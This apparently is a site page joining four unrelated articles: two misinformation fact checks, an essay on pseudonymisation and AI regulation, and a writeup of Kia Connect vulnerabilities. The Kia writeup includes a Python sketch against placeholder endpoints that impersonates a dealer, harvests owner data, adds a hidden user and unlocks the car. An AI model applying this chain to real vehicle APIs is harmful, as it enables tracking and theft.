#FactCheck - Philadelphia Plane Crash Video Falsely Shared as INS Vikrant Attack on Karachi Port
Executive Summary:
A video currently circulating on social media falsely claims to show the aftermath of an Indian Navy attack on Karachi Port, allegedly involving the INS Vikrant. Upon verification, it has been confirmed that the video is unrelated to any naval activity and in fact depicts a plane crash that occurred in Philadelphia, USA. This misrepresentation underscores the importance of verifying information through credible sources before drawing conclusions or sharing content.
Claim:
Social media accounts shared a video claiming that the Indian Navy’s aircraft carrier, INS Vikrant, attacked Karachi Port amid rising India-Pakistan tensions. Captions such as “INDIAN NAVY HAS DESTROYED KARACHI PORT” accompanied the footage, which shows a crash site with debris and small fires.

Fact Check:
A reverse image search traced the viral video to earlier uploads on Facebook and X (formerly Twitter) dated February 2, 2025. The footage is from a plane crash in Philadelphia, USA, involving a Mexican-registered Learjet 55 (tail number XA-UCI) that crashed near Roosevelt Mall.

Major American news outlets, including ABC7, reported the incident on February 1, 2025. According to NBC10 Philadelphia, the crash resulted in the deaths of seven individuals, including one child.

Conclusion:
The viral video claiming to show an Indian Navy strike on Karachi Port involving INS Vikrant is entirely misleading. The footage is from a civilian plane crash that occurred in Philadelphia, USA, and has no connection to any military activity or recent developments involving the Indian Navy. Verified news reports confirm the incident involved a Mexican-registered Learjet and resulted in civilian casualties. This case highlights the ongoing issue of misinformation on social media and emphasizes the need to rely on credible sources and verified facts before accepting or sharing sensitive content, especially on matters of national security or international relations.
- Claim: INS Vikrant attacked Karachi Port amid rising India-Pakistan tensions
- Claimed On: Social Media
- Fact Check: False and Misleading

Overview:
‘Kia Connect’ is the companion application for Kia vehicles that lets owners control various vehicle functions from their smartphones. The vulnerabilities affect most Kias built after 2013, with few exceptions. Most of the risk stems from a flawed API used for dealer relations and vehicle coordination.
Technical Breakdown of Exploitation:
- API Exploitation: The attack abuses vulnerabilities in Kia’s dealer infrastructure. The researchers found that impersonating a dealer and registering on the Kia dealer portal was enough to obtain the access tokens needed for the subsequent steps.
- Accessing Vehicle Information: A license plate number was enough for attackers to retrieve the Vehicle Identification Number (VIN) of a target car. The VIN is the key identifier for all subsequent lookups about the vehicle.
- Information Retrieval: With the VIN in hand, attackers could issue a series of backend requests to pull sensitive information about the car owner, including:
- Name
- Email address
- Phone number
- Physical address
- Modifying Account Access: With this information, attackers could change the account settings to add themselves as a second user on the vehicle, hidden from the actual owner.
- Executing Remote Commands: The researchers also found that attackers could remotely execute commands on the vehicle, including:
- Unlocking doors
- Starting the engine
- Tracking the vehicle’s location
- Honking the horn
Technical Execution:
The researchers demonstrated that an attacker could execute a series of four requests to gain control over a Kia vehicle (a hedged sketch of this chain follows the list):
- Generate Dealer Token: The attacker sends an HTTP request to the dealer portal to generate a dealer access token.
- Retrieve Owner Information: Using the generated token, they query another endpoint that returns the owner’s email address and phone number.
- Modify Access Permissions: Armed with the leaked email address and VIN, the attacker modifies the account’s user list and adds himself as a second user.
- Execute Commands: Finally, they can send commands that perform actions on the vehicle.
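To make the flow concrete, here is a minimal Python sketch of how such a request chain could look. All endpoint paths, parameter names, and response fields are hypothetical placeholders invented for illustration; they do not reproduce Kia’s actual API. The point is only the structure of the chain: token, lookup, permission change, command.

```python
import requests

# Hypothetical dealer-facing host; not Kia's real infrastructure.
BASE = "https://dealer-portal.example.com"

def attack_chain(license_plate: str) -> None:
    # Step 1: register as a fake dealer and obtain an access token.
    token = requests.post(f"{BASE}/register/dealer", json={
        "name": "Fake Dealer", "email": "attacker@example.com",
    }).json()["access_token"]  # hypothetical response field
    headers = {"Authorization": f"Bearer {token}"}

    # Step 2: resolve the plate to a VIN, then pull the owner's details.
    vin = requests.get(f"{BASE}/vehicles/lookup",
                       params={"plate": license_plate},
                       headers=headers).json()["vin"]
    owner = requests.get(f"{BASE}/owners/{vin}", headers=headers).json()
    print("Leaked owner record:", owner)

    # Step 3: add the attacker as a hidden second user on the vehicle.
    requests.post(f"{BASE}/vehicles/{vin}/users", headers=headers, json={
        "email": "attacker@example.com", "role": "secondary",
    })

    # Step 4: issue remote commands (unlock, start, locate, honk).
    requests.post(f"{BASE}/vehicles/{vin}/commands",
                  headers=headers, json={"command": "UNLOCK"})
```

The takeaway is that every step is an ordinary authenticated web request; nothing requires physical access to the car, which is why hardening the web-facing API matters as much as securing the vehicle itself.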
Security Response and Precautionary Measures for Vehicle Owners:
- Regular Software Updates: Car owners should make sure their vehicles receive the latest software updates released by the manufacturer.
- Use Strong Passwords: Kia Connect account holders should create unique, complex passwords and update them periodically, avoiding easily guessed choices such as birth dates or vehicle registration numbers.
- Enable Multi-Factor Authentication: Vehicle owners should turn on multi-factor authentication wherever it is available to protect against unauthorized account access.
- Limit Personal Information Sharing: Owners should be careful about exposing details linked to their car’s account, such as the email address or phone number, on social networks and elsewhere.
- Monitor Account Activity: Watch the account for unauthorized changes or access attempts, and report anything abnormal or suspicious to Kia customer support.
- Educate Yourself on Vehicle Security: Stay informed about vehicle-related cyber threats and how to safeguard against them.
- Consider Disabling Remote Features When Not Needed: If remote features are not in use, turn them off and re-enable them only when required. This reduces the attack surface available to would-be hackers.
Industry Implications:
The findings from this research underscore broader issues within automotive cybersecurity:
- Web Security Gaps: Most car manufacturers focus on the security of the equipment inside the vehicle rather than on the web services the car depends on, leaving highly connected vehicles exposed to risk.
- Continued Risks: As vehicles become increasingly connected to internet technologies, automakers will have to build strong cybersecurity measures into their cars going forward.
Conclusion:
The weaknesses found in Kia’s connected car system are a key concern for automotive security. As cars come to depend on web services for core features, manufacturers inherit the accompanying risks and must build effective safeguards. Kia acted quickly to tighten security after disclosure, but new threats will keep emerging in this fast-moving domain of connected technology. With growing awareness of these risks, car makers must not only implement proper security measures but also keep customers informed about how their information and vehicles are protected from cyber dangers. As automotive technology advances at this pace, its safety ultimately rests on our capacity to shield it from ever-present cyber threats.
References:
- https://timesofindia.indiatimes.com/auto/cars/hackers-could-unlock-your-kia-car-with-just-a-license-plate-is-yours-safe/articleshow/113837543.cms
- https://www.thedrive.com/news/hackers-found-millions-of-kias-could-be-tracked-controlled-with-just-a-plate-number
- https://www.securityweek.com/millions-of-kia-cars-were-vulnerable-to-remote-hacking-researchers/
- https://news24online.com/auto/kia-vehicles-hack-connected-car-cybersecurity-threat/346248/
- https://www.malwarebytes.com/blog/news/2024/09/millions-of-kia-vehicles-were-vulnerable-to-remote-attacks-with-just-a-license-plate-number
- https://informationsecuritybuzz.com/kia-vulnerability-enables-remote-acces/
- https://samcurry.net/hacking-kia

Executive Summary
A viral message on social media platforms such as X and Facebook claims that the Indian Government will start charging 18% GST on "good morning" texts from April 1, 2024. This is misinformation. The message includes a newspaper clipping and a video that were actually part of a fake news report from 2018. The newspaper article from Navbharat Times, published on March 2, 2018, was clearly intended as a joke. In addition, a video from ABP News, originally aired on March 20, 2018, was part of a fact-checking segment that debunked the rumor of a GST on greetings.

Claims:
The claim circulating online suggests that the Government will start applying 18% GST to all "Good Morning" texts sent through mobile phones from April 1 this year, with the tax added to monthly mobile bills.

Fact Check:
On receiving the claim, we first ran relevant keyword searches and found a Facebook video by ABP News titled Viral Sach: ‘Govt to impose 18% GST on sending good morning messages on WhatsApp?’

We watched the full video and found that the news is six years old. The Research Wing of CyberPeace Foundation also found the full version of the widely shared ABP News clip on its website, dated March 20, 2018. The video showed a newspaper clipping from Navbharat Times, published on March 2, 2018, carrying a humorous article with the tagline "Bura na mano, Holi hai" ("Don't take offence, it's Holi"). The recent viral image is a cutout from that 2018 ABP News segment.
Hence, the recent image that is spreading widely is Fake and Misleading.
Conclusion:
The viral message claiming that the government will impose GST (Goods and Services Tax) on "Good morning" messages is completely fake. The newspaper clipping used in the message is from an old comic article published by Navbharat Times, while the clip and image from ABP News have been taken out of context to spread false information.
Claim: India will introduce a Goods and Services Tax (GST) of 18% on all "good morning" messages sent through mobile phones from April 1, 2024.
Claimed on: Facebook, X
Fact Check: Fake; the clipping comes from a comic article published by Navbharat Times on 2 March 2018

Introduction
In today’s digital world, data has emerged as the new currency that influences global politics, markets, and societies. Companies, governments, and tech behemoths aim to control data because it accords them influence and power. However, a fundamental challenge brought about by this increased reliance on data is how to strike a balance between privacy protection and innovation and utility.
In recognition of these dangers, more than 200 Nobel laureates, scientists, and world leaders have recently signed the Global Call for AI Red Lines. Governments are urged by this initiative to create legally binding international regulations on artificial intelligence by 2026. Its goal is to stop AI from going beyond moral and security bounds, particularly in areas like political manipulation, mass surveillance, cyberattacks, and dangers to democratic institutions.
One way to address the threat to privacy is pseudonymisation, which keeps data valuable for research and innovation by replacing personal identifiers with artificial ones. Pseudonymisation thus directly advances the AI Red Lines initiative's mission of facilitating technological advancement while lowering the risks of data misuse and privacy violations.
The Red Lines of AI: Why do they matter?
The Global Call for AI Red Lines initiative represents a collective attempt to impose precaution before catastrophe by defining clear red lines for the use of AI tools. What unites the risks of AI use is the absence of global safeguards. Some of these red lines can be understood as:
- Cybersecurity breaches in the form of exposure of financial and personal data due to AI-driven hacking and surveillance.
- Privacy invasions caused by pervasive, round-the-clock tracking.
- Generative AI producing realistic fake content that undermines trust in public discourse and fuels misinformation.
- Algorithmic amplification of polarising content that threatens civic stability and disrupts democratic processes.
Legal Frameworks and Regulatory Landscape
AI regulation remains fragmented across jurisdictions, leaving significant loopholes. Some frameworks already provide partial guidance: the European Union’s Artificial Intelligence Act 2024 bans “unacceptable” AI practices, while a US-China understanding affirms that nuclear weapons must remain under human, not machine, control. The UN General Assembly has adopted resolutions urging safe and ethical AI use, though a binding global treaty remains elusive.
On the data protection front, the EU’s General Data Protection Regulation (GDPR) offers a clear definition of pseudonymisation under Article 4(5): a process in which personal data is altered so that it can no longer be attributed to an individual without additional information, which must be stored securely and separately. Importantly, pseudonymised data still qualifies as “personal data” under the GDPR. India’s Digital Personal Data Protection Act (DPDP) 2023 adopts a similar stance: it does not explicitly define pseudonymisation, but its broad definition of “personal data” covers potentially reversible identifiers. Under Section 8(4) of the Act, companies must adopt appropriate technical and organisational measures. International instruments such as the OECD AI Principles and the Council of Europe’s Convention 108+ emphasise accountability, transparency, and data minimisation. Collectively, these instruments point towards pseudonymisation as a best practice, though interpretations of its scope differ.
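To make the Article 4(5) definition concrete, here is a minimal Python sketch of keyed pseudonymisation. The dataset and field names are invented for illustration; the essential point is that direct identifiers are replaced with stable keyed pseudonyms, while the key, the "additional information" needed for re-identification, is held securely and separately from the working data.

```python
import hmac
import hashlib

# The re-identification key (the "additional information" under GDPR
# Art. 4(5)) must live apart from the pseudonymised dataset, e.g. in a
# key vault. A hard-coded placeholder is used here only for the sketch.
SECRET_KEY = b"load-me-from-a-separate-key-vault"

def pseudonymise(identifier: str) -> str:
    """Replace a direct identifier with a stable keyed pseudonym."""
    digest = hmac.new(SECRET_KEY, identifier.encode(), hashlib.sha256)
    return digest.hexdigest()[:16]

# Hypothetical patient records, invented for illustration.
records = [
    {"name": "Asha Rao", "email": "asha@example.com", "diagnosis": "D123"},
    {"name": "Ravi Iyer", "email": "ravi@example.com", "diagnosis": "D456"},
]

# The working dataset keeps a pseudonym instead of direct identifiers.
# The same person always maps to the same pseudonym, so records remain
# linkable for analysis, but cannot be reversed without the key.
pseudonymised = [
    {"patient_id": pseudonymise(r["email"]), "diagnosis": r["diagnosis"]}
    for r in records
]
print(pseudonymised)
```

Because the mapping can be reversed only with the separately held key, such data remains "personal data" under the GDPR, which is exactly the distinction the regulation draws between pseudonymisation and full anonymisation.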
Strategies for Corporate Implementation
For a company, pseudonymisation is not just about compliance; it is a practical measure with tangible benefits. By pseudonymising data, businesses can:
- Enhance privacy protection by masking identifiers such as names or IDs, reducing the impact of data breaches.
- Preserve data utility: unlike full anonymisation, pseudonymisation retains the patterns essential for analytics and innovation.
- Facilitate data sharing, allowing organisations to collaborate with partners and researchers while maintaining trust.
These benefits translate into competitive advantages: customers are more likely to trust organisations that prioritise data protection, and pseudonymisation enables firms to engage in cross-border collaboration without violating local data laws.
Balancing Privacy Rights and Data Utility
The central dilemma is one of balance. On one side lies the need for data utility: companies, researchers, and governments rely on large datasets to scale AI innovation. On the other lies the right to privacy, a non-negotiable principle protected under international human rights law.
Pseudonymisation offers a practical compromise, enabling the use of sensitive data while reducing privacy risk. In healthcare, it allows researchers to work with patient information without exposing identities; in finance, it supports fraud detection without revealing customer details, as the short sketch below illustrates.
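Continuing the finance example, here is a small follow-on sketch (with invented data and hypothetical fields) showing that per-customer activity patterns, the raw material of fraud screening, can still be computed from pseudonyms alone, without ever touching real identities.

```python
from collections import Counter

# Hypothetical pseudonymised transaction log, invented for illustration:
# each entry carries a keyed pseudonym rather than the customer's identity.
transactions = [
    {"customer": "9f2a17c3b4d9e801", "amount": 120.00},
    {"customer": "9f2a17c3b4d9e801", "amount": 4999.00},
    {"customer": "b71c55aa0e3f6d22", "amount": 35.50},
]

# Per-customer activity can still be aggregated for fraud screening.
per_customer = Counter(t["customer"] for t in transactions)
flagged = [c for c, n in per_customer.items() if n > 1]  # toy threshold
print(flagged)  # pseudonyms only; identities stay protected
```

Only an authorised party holding the separately stored key could map a flagged pseudonym back to a real customer, which keeps investigation possible without exposing identities during routine analysis.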
Conclusion
The rapid rise of artificial intelligence has outpaced regulation, raising urgent questions of safety, fairness, and accountability. The global call to recognise AI red lines is a bold step towards setting universal boundaries. Yet, alongside eventual global treaties, practical safeguards are also needed. Pseudonymisation exemplifies such a safeguard: it is legally recognised under the GDPR, increasingly relevant under India’s DPDP Act, and balances the twin imperatives of privacy protection and data utility. For organisations, adopting pseudonymisation is not only about regulatory compliance; it is also about building trust, ensuring resilience, and aligning with broader ethical responsibilities in the digital age. However the future of AI unfolds, the guiding principles need to be clear. By embedding privacy-preserving techniques like pseudonymisation into AI systems, we can take a significant step towards a sustainable, ethical, and innovation-driven digital ecosystem.
References
- https://www.techaheadcorp.com/blog/shadow-ai-the-risks-of-unregulated-ai-usage-in-enterprises/
- https://planetmainframe.com/2024/11/the-risks-of-unregulated-ai-what-to-know/
- https://cepr.org/voxeu/columns/dangers-unregulated-artificial-intelligence
- https://www.forbes.com/sites/bernardmarr/2023/06/02/the-15-biggest-risks-of-artificial-intelligence/